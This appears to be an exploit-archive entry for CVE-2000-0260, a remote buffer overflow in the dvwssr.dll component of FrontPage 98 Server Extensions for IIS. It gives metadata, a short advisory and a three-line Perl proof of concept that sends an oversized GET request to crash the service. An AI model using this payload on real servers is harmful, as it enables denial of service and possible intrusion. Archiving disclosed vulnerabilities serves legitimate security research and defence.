Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow

Author: Richie & Beto
type: remote
platform: windows
port: 
date_added: 2000-04-14  
date_updated: 2012-07-15  
verified: 1  
codes: CVE-2000-0260;OSVDB-282  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19846.pl  

source: https://www.securityfocus.com/bid/1109/info

The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.


#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";